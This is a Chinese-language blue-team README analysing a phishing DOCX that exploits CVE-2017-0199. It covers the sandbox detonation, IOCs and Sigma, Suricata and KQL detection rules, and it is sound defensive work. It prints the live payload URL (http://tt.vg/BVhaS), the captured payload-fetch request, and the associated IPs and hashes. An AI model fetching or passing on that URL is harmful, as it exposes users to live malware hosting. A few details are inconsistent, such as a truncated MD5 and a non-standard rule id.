返回更新列表
已更新Jul 28, 2026

RCE-CVE-2017-0199-detection-analysis — 已更新!

本仓库包含对一个利用 CVE-2017-0199 的真实恶意 DOCX 文件的完整蓝队恶意软件分析。该实验环境涵盖沙箱执行、网络取证、IOC 提取、MITRE ATT&CK 映射、释放文件审查及检测规则。证据截图已包含在 evidence 文件夹中,用于专业文档记录。

分享

🛡️ BankPaymAdviceVend.Report.docx CVE-2017-0199 – 完整蓝队沙箱分析

高级恶意软件引爆 • 漏洞利用行为 • IOC • 检测工程。



🎯 1. 执行摘要

本仓库记录了一个利用 **CVE-2017-0199** Microsoft Office RCE 漏洞的**真实恶意 DOCX** 文件。 该样本在 **Windows 10 ANY.RUN 沙箱** 中引爆,暴露了以下内容:

✔ 完整漏洞利用链
✔ 对恶意域名的网络回调(tt.vg
✔ 释放的文件与临时产物
✔ JA3 指纹
✔ 注册表活动
✔ WINWORD.EXE 发出的 HTTP/HTTPS 信标
✔ 完整蓝队 IOC 与检测规则


🔍 2. 场景背景

一封标题为 “BankPaymAdviceVend.Report.docx” 的文档通过钓鱼邮件收到。
一旦引爆,ANY.RUN 立即将其标记为 恶意,并将其关联到:

  • CVE-2017-0199 Word RCE 漏洞利用
  • WINWORD.EXE 建立隐蔽的 HTTP/HTTPS 连接
  • 联系 恶意短域名 tt.vg
  • 尝试检索远程载荷 /BVhaS


📄 3. 样本信息

字段
文件BankPaymAdviceVend.Report.docx
判定恶意活动
标签cve-2017-0199, exploit
MD522EDED727467A9A26F3FD311A12A7E
SHA16738D1A969193459C7C7579956269D77FED8D26F
SHA2562E1408013503C...3D6EAF9
沙箱Windows 10 Pro x64
行为漏洞利用 → 网络信标 → 释放文件

🧬 4. 攻击链(高层示意图)

[ 恶意 DOCX ] │ ▼ [ 用户在 Word 中打开 ] │ ▼ [CVE-2017-0199 漏洞利用触发] │ ▼ [WINWORD.EXE → 通过 HTTP/HTTPS 访问 tt.vg] │ ▼ [远程路径: /BVhaS (GET / HEAD / OPTIONS)] │ ▼ [释放临时文件、EMF 对象、缓存文件] │ ▼ [潜在下一阶段载荷 — 服务器返回 404]

yaml Copy code


🌐 5. 网络行为

5.1 DNS 请求

仅有一个域名是恶意的:

域名信誉
tt.vg🔴 恶意

解析出的 IP:

188.114.96.3 188.114.97.3 172.67.138.42 (TLS v1.2)

yaml Copy code


📡 5.2 HTTP/HTTPS 信标

Word 尝试获取:

GET /BVhaS HEAD /BVhaS OPTIONS / Host: tt.vg User-Agent: Microsoft Office / MSIE 7 伪装

yaml Copy code

捕获到的典型请求:

GET /BVhaS HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0...) Connection: Keep-Alive Host: tt.vg

arduino Copy code

服务器响应:

HTTP/1.1 404 Not Found

yaml Copy code


📁 6. 释放的文件

值得注意的产物

  • 多个 .tmp 文件
  • Office .glox 图形对象
  • 浏览器缓存中的 EMF 图像:
    %LOCALAPPDATA%\INetCache\Content.MSO\*.emf
  • 最近文档快捷方式 .LNK
  • index.dat 日志
  • Office 校对字典更改

🔐 7. 注册表与系统行为

Word 访问了:

HKCU\Software\Microsoft\Office\14.0... HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings... HKLM\System\ControlSet001\Services\Tcpip\Parameters\Interfaces...

yaml Copy code

✔ 对 Office 而言属于正常行为
❌ 与漏洞利用结合 = 明确的恶意行为


💣 8. 漏洞利用分析 — CVE-2017-0199

类型: 远程代码执行
触发方式: 恶意 DOCX 在无需用户交互的情况下加载远程 HTA
影响版本: Microsoft Word 2007–2016
影响: 攻击者执行任意代码

该样本尝试从以下地址加载远程载荷:

http://tt.vg/BVhaS

yaml Copy code


🧩 9. IOC

🔥 9.1 网络指标

域名: tt.vg

URL: http://tt.vg/BVhaS https://tt.vg/BVhaS

IP: 188.114.96.3 188.114.97.3 172.67.138.42

shell Copy code

🔐 9.2 JA3 SSL 指纹

091f51a7a1c3a4504a224cc081ce9cee 46f5131e766d248db0248a86c494b71c 65005c9d9ae0f0ebeaf22c210571d482 ...

yaml Copy code


🔍 10. 检测思路(Sigma / Suricata / EDR)

本节将 BankPaymAdviceVend.Report.docx 的技术分析转化为实用的、 可直接部署的生产级检测产物,供 SOC蓝队 立即使用。 内容包括 Sigma 规则Suricata IDS 签名EDR 狩猎查询


🧾 10.1 Sigma 规则 — WINWORD → tt.vg

此 Sigma 规则检测 Windows 网络日志中由 WINWORD.EXE 发起的 指向可疑短域名 tt.vg 的任何网络连接。

title: WINWORD Connecting To Suspicious Short Domain tt.vg
id: 0b2a5f3d-ttvg-word
status: experimental

logsource:
  category: network_connection
  product: windows

detection:
  selection:
    Image|endswith: '\WINWORD.EXE'
    DestinationHostname: 'tt.vg'
  condition: selection

level: high
tags:
  - attack.command_and_control
  - attack.t1071.001
  - cve.2017-0199

💡 任何过时的 Office 系统通过 WINWORD.EXE 联系 tt.vg 都应立即触发调查。


🌐 10.2 Suricata 规则 — 在 tt.vg 上发起 HTTP GET /BVhaS

一条 Suricata IDS 规则,用于识别源自 Office 的 对恶意域名 tt.vgGET /BVhaS 的请求。 该规则可捕获漏洞利用尝试检索载荷的行为。

alert http $HOME_NET any -> $EXTERNAL_NET any (
    msg:"C2 – Office WINWORD GET /BVhaS on tt.vg";
    flow:established,to_server;
    http.method; content:"GET";
    http.uri; content:"/BVhaS"; nocase;
    http.host; content:"tt.vg"; nocase;
    http.user_agent; content:"MSOffice"; nocase;
    reference:cve,2017-0199;
    classtype:trojan-activity;
    sid:4200010;
    rev:1;
)

🔥 在使用 SuricataZeek 监控出站流量的环境中非常有效。


🛰️ 10.3 EDR 狩猎查询 — WINWORD + tt.vg 指标

一条 KQL(Microsoft Defender)狩猎查询,用于识别环境中 任何表现出对 tt.vg 或其关联 IP 地址进行类似恶意信标行为的机器。

DeviceNetworkEvents
| where InitiatingProcessFileName == "WINWORD.EXE"
| where RemoteUrl in ("tt.vg")
   or RemoteIp in ("188.114.96.3","188.114.97.3","172.67.138.42")

🎯 目的:将单次沙箱引爆扩展为 全企业范围的狩猎


🧩 11. 本实验展示的内容

本实验展示了您端到端分析真实 钓鱼 DOCX 样本的能力, 遵循完整的 SOC 级方法论:

  • 理解 CVE-2017-0199 如何在 Microsoft Word 中被触发。
  • 追踪 WINWORD.EXE 如何成为意外的 HTTP/S 客户端
  • 提取 网络 IOC(域名、URL、IP、JA3 TLS 哈希)。
  • 分析 释放的文件最近快捷方式注册表访问 的取证价值。
  • 将所有发现转化为 SigmaSuricataEDR 狩猎查询

换句话说——本实验不止于引爆。 它像专业 SOC 分析师一样提取真实、可操作的检测情报。


设计与文档:Ahmed Tarek Salah

分类